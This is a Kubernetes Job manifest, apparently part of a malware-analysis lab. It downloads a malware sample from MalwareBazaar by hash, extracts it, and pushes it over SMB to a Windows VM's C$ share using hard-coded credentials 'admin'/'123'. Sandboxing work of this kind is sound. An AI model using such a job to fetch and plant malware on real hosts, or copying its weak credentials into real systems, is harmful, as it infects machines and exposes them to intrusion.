apiVersion: batch/v1
kind: Job
metadata:
  name: deployer
  namespace: deployer
  labels:
    app: deployer
spec:
  ttlSecondsAfterFinished: 10
  backoffLimit: 0
  template:
    metadata:
      annotations:
        v1.multus-cni.io/default-network: vms/malware-network-host-local
    spec:
      dnsPolicy: None # ignore anything configured from the cluster
      dnsConfig:
        nameservers:
        - 10.244.0.254
        searches:
        - home.arpa
        options:
        - name: ndots
          value: "1"

      restartPolicy: Never
      containers:
        - name: deploy-malware
          image: docker.io/library/alpine
          command: ["/bin/sh", "-c"]

          env:
          - name: PAYLOAD_URL
            value: 'https://mb-api.abuse.ch/api/v1/'
          - name: QUERY_PARAMS
            value: 'query=get_file&sha256_hash=a259e9b0acf375a8bef8dbc27a8a1996ee02a56889cba07ef58c49185ab033ec'
          - name: API_KEY
            valueFrom:
              secretKeyRef:
                name: malware-bazar
                key: key
                optional: false
          - name: ARCHIVE_PASSWORD
            valueFrom:
              secretKeyRef:
                name: malware-bazar
                key: password
                optional: false
          - name: SMB_USERNAME
            value: 'admin'
          - name: SMB_PASSWORD
            value: '123'
          - name: SMB_SHARE
            value: '\\10.244.0.157\C$'
          - name: SMB_TARGET_DIR
            value: 'Users\admin\Downloads\Recent'

          workingDir: /var/run/malware

          args:
          - |
            set -xe
            apk add --no-cache --quiet samba-client curl p7zip

            set +x
            curl -H "API-KEY: $API_KEY" -X POST --output mega.zip "$PAYLOAD_URL" -d "$QUERY_PARAMS"
            set -x

            mkdir payload
            cd payload

            7z x -p${ARCHIVE_PASSWORD} ../mega.zip

            PAYLOAD=$(ls | head -n 1)

            smbclient \
              --user $SMB_USERNAME \
              --password $SMB_PASSWORD \
              -c "cd $SMB_TARGET_DIR ; put $PAYLOAD" \
              $SMB_SHARE

          volumeMounts:
          - name: malware-volume
            mountPath: /var/run/malware

      volumes:
      - name: malware-volume
        emptyDir:
          # It's VERY important for this to be set to Memory. It will ensure
          # that the malware in this volume only exists in memory for the
          # lifetime of the pod.
          medium: Memory 
